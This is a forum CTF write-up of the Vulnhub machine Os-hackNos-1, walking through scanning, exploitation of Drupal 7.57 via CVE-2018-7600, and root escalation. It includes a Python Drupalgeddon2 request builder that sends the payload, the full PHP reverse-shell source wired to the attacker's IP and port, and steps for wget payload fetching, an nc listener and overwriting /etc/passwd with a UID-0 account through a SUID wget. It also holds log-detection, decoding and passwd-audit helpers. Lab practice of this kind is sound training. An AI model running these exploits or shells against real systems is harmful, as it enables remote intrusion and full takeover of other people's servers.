Vulnhub machine practice notes - Os-hackNos-1

boy0s   ·   posted 2023-05-17 16:09:25   ·   CTF&WP section

Vulnhub machine download

https://www.vulnhub.com/entry/hacknos-os-hacknos,401/

Lab environment:

NAT mode
kali: 192.168.242.131
target: 192.168.242.142

Pentest

Probe the target with nmap

Ports 80 and 22 are open

Directory scan of port 80 with dirsearch finds a drupal directory

Scan again with dirb: dirb seems to find more than dirsearch here, so in a real engagement use several different tools for information gathering to get more complete coverage

Visiting the drupal directory gives a login page; weak-password login attempts fail, so try another approach

dirb earlier found a robots.txt under the drupal directory; it may hold clues
Sure enough, the site's paths are all exposed; the CHANGELOG.txt file stands out

CHANGELOG.txt gives the Drupal version as 7.57. Search Baidu for vulnerabilities in this version to see if any are directly exploitable

The search turns up CVE-2018-7600 (Drupalgeddon2), a remote code execution vulnerability in multiple subsystems of Drupal 7.x and 8.x.
Download the exp

The exp runs successfully; the command execution vulnerability is present

The -c parameter takes the command to run
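The exp used above is a downloaded script and is not shown in the post. The following is an added example, not the author's exp and not Drupal code: it shows the request shape that CVE-2018-7600 abuses on Drupal 7 (the publicly documented form-API render-array injection), and a log-side check that spots the same request in web server logs. The target URL and addresses are taken from the lab above; the access-log lines are constructed for this example.

```python
# Added example: CVE-2018-7600 request shape plus an access-log indicator check.
# Not the author's exp and not Drupal code; sample log lines are constructed.
import re
import urllib.request
from urllib.parse import unquote, urlencode


def build_drupal7_payload(base_url, command):
    """Return (url, form_fields) for the Drupal 7.x variant of CVE-2018-7600.

    Drupal's AJAX form handler trusts element_parents from the query string and
    rebuilds the 'mail' render array from POST data, so attacker-supplied
    '#post_render' => ['exec'] and '#markup' => command make Drupal call
    exec(command) while rendering the response.
    """
    query = urlencode({
        "element_parents": "account/mail/#value",
        "ajax_form": "1",
        "_wrapper_format": "drupal_ajax",
    })
    url = f"{base_url.rstrip('/')}/user/register?{query}"
    fields = {
        "form_id": "user_register_form",
        "_drupal_ajax": "1",
        "mail[#post_render][]": "exec",
        "mail[#type]": "markup",
        "mail[#markup]": command,
    }
    return url, fields


def fire(url, fields, timeout=10):
    """Send the POST and return the body. Only ever point this at a lab target."""
    data = urlencode(fields).encode()
    req = urllib.request.Request(url, data=data)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


# Detection side. The POST body (where #post_render lives) never reaches an
# access log, but the query string does, and the element_parents value is the
# giveaway. Percent-decode twice so %23 and double-encoded %2523 both match.
_INDICATORS = (
    re.compile(r"element_parents=[^&\s]*#value", re.I),
    re.compile(r"#post_render", re.I),   # Drupal 7 body, visible in proxy/WAF logs
    re.compile(r"#lazy_builder", re.I),  # Drupal 8 variant of the same bug
)


def is_drupalgeddon2(log_line):
    decoded = unquote(unquote(log_line))
    return any(p.search(decoded) for p in _INDICATORS)


def scan_log(lines):
    """Return (index, line) pairs for every line matching an indicator."""
    return [(i, line) for i, line in enumerate(lines) if is_drupalgeddon2(line)]


# Constructed access-log sample (addresses and paths from the lab above).
SAMPLE_LOG = [
    '192.168.242.131 - - [17/May/2023:16:09:25 +0800] "GET /drupal/robots.txt HTTP/1.1" 200 1527',
    '192.168.242.131 - - [17/May/2023:16:10:02 +0800] "POST /drupal/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 612',
    '192.168.242.131 - - [17/May/2023:16:11:40 +0800] "GET /drupal/ev.php HTTP/1.1" 200 0',
    '10.0.0.7 - - [17/May/2023:16:12:00 +0800] "POST /drupal/user/register?element_parents=account%252Fmail%252F%2523value&ajax_form=1 HTTP/1.1" 200 598',
]

if __name__ == "__main__":
    url, fields = build_drupal7_payload("http://192.168.242.142/drupal", "id")
    print(url)
    for i, line in scan_log(SAMPLE_LOG):
        print(f"suspicious line {i}: {line[:90]}")
```

The double unquote matters: a single decode leaves the double-encoded fourth line unmatched, and a literal `%23` regex misses it too. Run with a 7.58-or-later Drupal the same request returns a normal AJAX response, so the log check is what catches attempts against patched hosts.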

From here the approach is clear: upload a web shell and get a reverse shell
First write a PHP reverse-shell payload locally (pentestmonkey's php-reverse-shell)
Change the IP to kali's IP and the listening port to 10086


  <?php
  // php-reverse-shell - A Reverse Shell implementation in PHP
  // Copyright (C) 2007 pentestmonkey@pentestmonkey.net

  set_time_limit (0);
  $VERSION = "1.0";
  $ip = '192.168.242.131';  // You have changed this
  $port = 10086;  // And this
  $chunk_size = 1400;
  $write_a = null;
  $error_a = null;
  $shell = 'uname -a; w; id; /bin/sh -i';
  $daemon = 0;
  $debug = 0;

  //
  // Daemonise ourself if possible to avoid zombies later
  //

  // pcntl_fork is hardly ever available, but will allow us to daemonise
  // our php process and avoid zombies.  Worth a try...
  if (function_exists('pcntl_fork')) {
    // Fork and have the parent process exit
    $pid = pcntl_fork();

    if ($pid == -1) {
      printit("ERROR: Can't fork");
      exit(1);
    }
    if ($pid) {
      exit(0);  // Parent exits
    }
    // Make the current process a session leader
    // Will only succeed if we forked
    if (posix_setsid() == -1) {
      printit("Error: Can't setsid()");
      exit(1);
    }
    $daemon = 1;
  } else {
    printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
  }
  // Change to a safe directory
  chdir("/");

  // Remove any umask we inherited
  umask(0);

  //
  // Do the reverse shell...
  //

  // Open reverse connection
  $sock = fsockopen($ip, $port, $errno, $errstr, 30);
  if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
  }
  // Spawn shell process
  $descriptorspec = array(
    0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
    2 => array("pipe", "w")   // stderr is a pipe that the child will write to
  );

  $process = proc_open($shell, $descriptorspec, $pipes);

  if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
  }
  // Set everything to non-blocking
  // Reason: Occsionally reads will block, even though stream_select tells us they won't
  stream_set_blocking($pipes[0], 0);
  stream_set_blocking($pipes[1], 0);
  stream_set_blocking($pipes[2], 0);
  stream_set_blocking($sock, 0);

  printit("Successfully opened reverse shell to $ip:$port");

  while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
      printit("ERROR: Shell connection terminated");
      break;
    }
    // Check for end of STDOUT
    if (feof($pipes[1])) {
      printit("ERROR: Shell process terminated");
      break;
    }
    // Wait until a command is end down $sock, or some
    // command output is available on STDOUT or STDERR
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send
    // data to process's STDIN
    if (in_array($sock, $read_a)) {
      if ($debug) printit("SOCK READ");
      $input = fread($sock, $chunk_size);
      if ($debug) printit("SOCK: $input");
      fwrite($pipes[0], $input);
    }
    // If we can read from the process's STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
      if ($debug) printit("STDOUT READ");
      $input = fread($pipes[1], $chunk_size);
      if ($debug) printit("STDOUT: $input");
      fwrite($sock, $input);
    }
    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
      if ($debug) printit("STDERR READ");
      $input = fread($pipes[2], $chunk_size);
      if ($debug) printit("STDERR: $input");
      fwrite($sock, $input);
    }
  }
  fclose($sock);
  fclose($pipes[0]);
  fclose($pipes[1]);
  fclose($pipes[2]);
  proc_close($process);

  // Like print, but does nothing if we've daemonised ourself
  // (I can't figure out how to redirect STDOUT like a proper daemon)
  function printit ($string) {
    global $daemon;  // without this $daemon is undefined in function scope and the check never fires
    if (!$daemon) {
      print "$string\n";
    }
  }
  ?>

Start an HTTP server with python in the directory holding the payload

ev.php is the payload written above

Use the exp to run wget on the target and download the payload

Check that the file landed

Start an nc listener

Request ev.php

Shell caught successfully

python3 -c 'import pty;pty.spawn("/bin/bash")' upgrades to a fully interactive bash

alexander.txt in this directory holds a base64-encoded blob

Decoding it reveals a Brainfuck program

Decoding that in turn yields a username and password
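The two-layer decode above is usually done with online tools. As an added example (not the author's code, and not the real contents of alexander.txt), the following peels both layers offline: strict base64 decoding, a heuristic that recognises a Brainfuck program, and a small Brainfuck interpreter. The secret it decodes is a constructed placeholder, not the credential from the box; the encoder is only there to build that sample.

```python
# Added example: base64 -> Brainfuck -> plaintext, all offline.
# Not the author's code; SAMPLE_SECRET is constructed, not the box's credential.
import base64
import binascii
import re

_BF_CHARS = set("+-<>[].,")


def brainfuck_encode(text):
    """Naive Brainfuck generator: for each byte, raise the cell, print it, clear it.

    Only used to build the constructed sample; real CTF programs are denser,
    but the interpreter below runs either.
    """
    return "".join("+" * b + ".[-]" for b in text.encode())


def run_brainfuck(program, input_bytes=b"", max_steps=10_000_000):
    """Interpret Brainfuck with 8-bit wrapping cells and return the output text."""
    code = [c for c in program if c in _BF_CHARS]
    # Pre-match brackets so each loop jump is O(1).
    jumps, stack = {}, []
    for i, c in enumerate(code):
        if c == "[":
            stack.append(i)
        elif c == "]":
            if not stack:
                raise ValueError("unbalanced ']'")
            j = stack.pop()
            jumps[i], jumps[j] = j, i
    if stack:
        raise ValueError("unbalanced '['")

    tape, ptr, pc, inp, out = [0] * 30000, 0, 0, 0, bytearray()
    for _ in range(max_steps):
        if pc >= len(code):
            break
        c = code[pc]
        if c == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif c == ">":
            ptr += 1
        elif c == "<":
            ptr -= 1
        elif c == ".":
            out.append(tape[ptr])
        elif c == ",":
            tape[ptr] = input_bytes[inp] if inp < len(input_bytes) else 0
            inp += 1
        elif c == "[" and tape[ptr] == 0:
            pc = jumps[pc]
        elif c == "]" and tape[ptr] != 0:
            pc = jumps[pc]
        pc += 1
    else:
        raise RuntimeError("step limit hit; program may not terminate")
    return out.decode(errors="replace")


def looks_like_brainfuck(text):
    """True when the non-whitespace content is (almost) entirely Brainfuck tokens."""
    body = re.sub(r"\s", "", text)
    return bool(body) and sum(c in _BF_CHARS for c in body) / len(body) > 0.9


def decode_layers(blob):
    """base64 -> (Brainfuck ->) plaintext; returns (layers_peeled, result)."""
    layers = []
    try:
        decoded = base64.b64decode(blob, validate=True).decode()
        layers.append("base64")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        decoded = blob
    if looks_like_brainfuck(decoded):
        decoded = run_brainfuck(decoded)
        layers.append("brainfuck")
    return layers, decoded


# Constructed sample with the same shape as alexander.txt and a made-up secret.
SAMPLE_SECRET = "demo:P@ssw0rd!"
SAMPLE_BLOB = base64.b64encode(brainfuck_encode(SAMPLE_SECRET).encode()).decode()

if __name__ == "__main__":
    layers, plain = decode_layers(SAMPLE_BLOB)
    print(" -> ".join(layers), ":", plain)
```

`validate=True` is deliberate: the default lenient decoder silently drops non-alphabet bytes, which turns arbitrary text into "valid" base64 garbage and hides a wrong guess about the outer layer. The step limit protects against pasting a non-terminating program from an untrusted file.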

Switch to james's home directory and find the first flag

Privilege escalation

First check for SUID-based escalation: search for files with the s bit set
wget has the SUID bit, so a normal user can run it with root's file permissions

The escalation plan is: download the target's /etc/passwd, append a UID-0 account to a copy of it, then use the SUID wget with -O to write the crafted file back over the original /etc/passwd

Copy the contents out to kali

Construct an account entry

Add it to the passwd file built on kali, giving it root privileges (UID 0 / GID 0)

Again use the exp's command execution to run wget -O and overwrite the file

Log in as the eval account
It has root privileges; escalation succeeded
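Two caveats a practitioner would want on the steps above: wget -O replaces /etc/passwd wholesale, so a truncated download locks everyone out of the box, and the injected account keeps its hash in the world-readable passwd file instead of /etc/shadow. The following is an added example (not the author's commands) that checks a passwd file for exactly this tampering, plus the SUID-bit test behind the wget trick. The sample passwd is constructed; the account name eval is the one used in the writeup, and its hash field is a placeholder string, not a real hash.

```python
# Added example: audit a passwd file for the tampering this escalation produces.
# Not the author's commands; SAMPLE_PASSWD is constructed, the hash is a placeholder.
import os
import stat


def parse_passwd(text):
    """Yield a dict per passwd line; malformed lines are reported, not skipped."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            yield {"lineno": lineno, "malformed": raw}
            continue
        name, pw, uid, gid, _gecos, home, shell = fields
        yield {"lineno": lineno, "name": name, "pw": pw, "uid": uid,
               "gid": gid, "home": home, "shell": shell}


def audit_passwd(text):
    """Return (lineno, finding) tuples; lineno 0 marks a file-wide finding."""
    findings = []
    uid0_names = []
    for e in parse_passwd(text):
        if "malformed" in e:
            findings.append((e["lineno"], "malformed line"))
            continue
        if not e["uid"].isdigit():
            findings.append((e["lineno"], f"non-numeric uid for {e['name']}"))
            continue
        # Shadowed systems keep 'x' (or a locked marker) here; anything else is
        # a hash or an empty password living in the world-readable file.
        if e["pw"] == "":
            findings.append((e["lineno"], f"empty password field for {e['name']}"))
        elif e["pw"] not in ("x", "*", "!"):
            findings.append((e["lineno"], f"password hash stored in passwd for {e['name']}"))
        if int(e["uid"]) == 0:
            uid0_names.append(e["name"])
            if e["name"] != "root":
                findings.append((e["lineno"], f"uid 0 account other than root: {e['name']}"))
    if len(uid0_names) > 1:
        findings.append((0, "multiple uid-0 accounts: " + ", ".join(uid0_names)))
    return findings


def is_suid(path):
    """True when the file carries the set-user-ID bit (what find / -perm -4000 lists)."""
    try:
        return bool(os.stat(path).st_mode & stat.S_ISUID)
    except FileNotFoundError:
        return False


# Constructed sample: a stock Debian-style passwd with the writeup's injected entry.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
james:x:1000:1000:james,,,:/home/james:/bin/bash
eval:$1$PLACEHOLDER$notarealhash:0:0:root:/root:/bin/bash
"""

if __name__ == "__main__":
    for lineno, finding in audit_passwd(SAMPLE_PASSWD):
        print(f"line {lineno}: {finding}")
    for binary in ("/usr/bin/wget", "/usr/bin/passwd"):
        print(binary, "SUID" if is_suid(binary) else "not SUID / absent")
```

On the defensive side the same three checks (extra UID-0 names, hashes outside /etc/shadow, and a SUID bit on a network download tool) are what a file-integrity baseline or a periodic cron audit should alert on; on the offensive side the audit doubles as a sanity check of the crafted file before it is written over the real one.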

The second flag is in root's ~ directory


2 replies   |  last 2023-5-30 | 588 views

杜星翰
posted 2023-5-20

11111111111


oldmanpushcar
posted 2023-5-30

Respect.
